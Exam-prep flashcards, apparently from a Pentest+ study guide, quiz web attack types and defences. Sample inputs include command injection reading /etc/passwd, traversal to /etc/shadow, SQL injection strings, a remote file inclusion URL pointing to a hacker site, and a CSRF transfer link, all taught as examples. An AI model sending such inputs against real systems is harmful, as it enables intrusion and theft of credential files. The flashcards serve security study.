CompTIA Pentest+ for Dummies Chapter 7 Prep Test Flashcards
You are authorized to perform an assessment on the company Intranet site that is used by employees within the company. There is a message board in the application. Which of the following would you use to attempt a cross-site scripting attack? A. http://site/board.php? m=hellp;phpinfo() B.http://site/board.php? dir=%3Bcat%20/etc/passwd C.http://site/board.php? m=Lunch%20Time ! &m=Lunch%20Time' or 1=1 -- D. http://site/board.php?m= alert("hello") ;
D. http://site/board.php?m=
alert(“hello”) ;
Explanation:
With a cross-site scripting attack, you are submitting script code as input, so watching for the script block and actual JavaScript helps find the answer
You are performing a pentest on a PHP website. What HTTP request would you use to perform a command injection attack? A. http://site/board.php? m=hellp;phpinfo() B.http://site/board.php? dir=%3Bcat%20/etc/passwd C.http://site/board.php? m=Lunch%20Time ! &m=Lunch%20Time' or 1=1 -- D. http://site/board.php?m= alert("hello") ;
B.http://site/board.php?
dir=%3Bcat%20/etc/passwd
Explanation:
A command injection attack has a reference to an OS command within the URL parameter list.
In this case, the ‘cat’ command is called to try and display the contents of the password file
You are assessing an application that is storing data in a database.
What HTTP request would you send that would be the quickest way to determine if SQL injection attacks may be successful on the site?
A. http:// site/ board.php? m = hello; phpinfo()
B. http:// site/ board.php? dir =% 3Bcat% 20/ etc/ passwd
C. http:// site/ board.php? m = Lunchtime!’
D.http:// site/ board.php? m = < script > alert(“ hello”); script >
C. http:// site/ board.php? m = Lunchtime!’
Explanation:
A quick way to test to see if the developer is validating input and stopping SQL injection is to simply add an apostrophe to the end of the URL.
If the developer is not validating input, this is passed to the database server, but there are mismatched quotes, so it will cause an error and not execute on the database server.
Although it did not work, because you received an error you know that it was passed to the database, which means the programmer is not validating input
What type of XSS attack stores the malicious input in a database to be processed by a visitor to the site at a later time? A.Persistent XSS B.DOM XSS C.Non-persistence XSS D.Reflected XSS
A.Persistent XSS
Explanation:
Persistent XSS, or stored XSS, involves storing the inputted data in a database so that it is processed and executed when a user views the page
You are monitoring the log files for your web server and see the following type of GET request appear many times in the log:
‘http:// www.website.com/../../../ etc/ shadow’
A.Persistent XSS
B.Directory Traversal
C.SQL Injection
D.Command Injection
B.Directory Traversal
Explanation:
Directory traversal, also known as folder traversal, is when you navigate the file system of the web server and access files using the URL
Which of the following commands would you use to perform a local file inclusion attack?
A. http:// site/ board.php? include = c:\ data\ program.exe
B. http:// site/ board.php? include = http:// hackersite/ program.exe
C. http:// site/ board.php? m = Lunchtime!’ +
D. http:// site/ board.php? m = < script > alert(“ hello”); script >
A. http:// site/ board.php? include = c:\ data\ program.exe
Explanation:
Performing a local file inclusion attack allows you to run program code you planted on the web server simply by referencing it in the URL
You are performing a pentest for Company XYZ and the Intranet server for the HR department is in the scope of the pentest.
You were set up as an employee and given logon credentials to the website.
While looking at your record, you change the “120” in the URL to “121”
http:// intranetsite/ emprecord.php? eid = 120
What type of attack is occurring? A.Parameter Pollution B.Persistent XSS C.Directory Traversal D.Insecure Direct Object Reference
D.Insecure Direct Object Reference
Explanation:
Insecure Direct Object Reference (IDOR) is when you modify the parameter data in the URL of the request message and are able to access another object or record through the website
You have determined that a company’s website is vulnerable to SQL injection attacks.
Which of the following would you recommend to help protect against SQL injections?
A.Use HTTPS instead of HTTP
B.Disable cookie usage
C.Use parameterized queries
D.Enable error handling
C.Use parameterized queries
Explanation:
In addition to incorporating validation logic, you should always use parameterized queries or stored procedures to execute any database logic.
The stored procedure uses parameters and may also contain validation logic
You are testing a web application against SQL injection attacks and find that the error messages are giving details about the database environment. What could you do to eliminate this? A.Use HTTPS instead of HTTP B.Implement Error Handling C.Review the Log File D.Change the database name
B.Implement Error Handling
Explanation:
It is important that developers implement error handling within their application to trap the errors and show friendly error messages that do not give details on the environment
What type of XSS attack does not store the malicious input in a database and simple processes the information for output right away? A.Persistent XSS B.DOM XSS C.Stored XSS D.Reflected XSS
D.Reflected XSS
Explanation:
Reflected XSS is also known as non-persistent XSS because it does not store the input into a database, but is processed on the server right away
Bob has received an email from the government stating that he has overpaid his taxes last year.
When Bob looked at the HTML code for the email, he noticed the following code:
< A href = https:// www.mybank.com/ account/etransfer?
to = hacker@ hacker.com& amount = 1000 > Collect Tax Refund
A >
A.Persistent XSS
B.Credential Harvesting
C.CSRF
D.Reflected XSS
C.CSRF
Explanation:
Looking at the HTML code, you can see that the code is sending a request for the etransfer functionality of the bank site and passing in parameters to populate who to send the etransfer to and how much money to transfer.
This is an example of a cross-site request forgery attack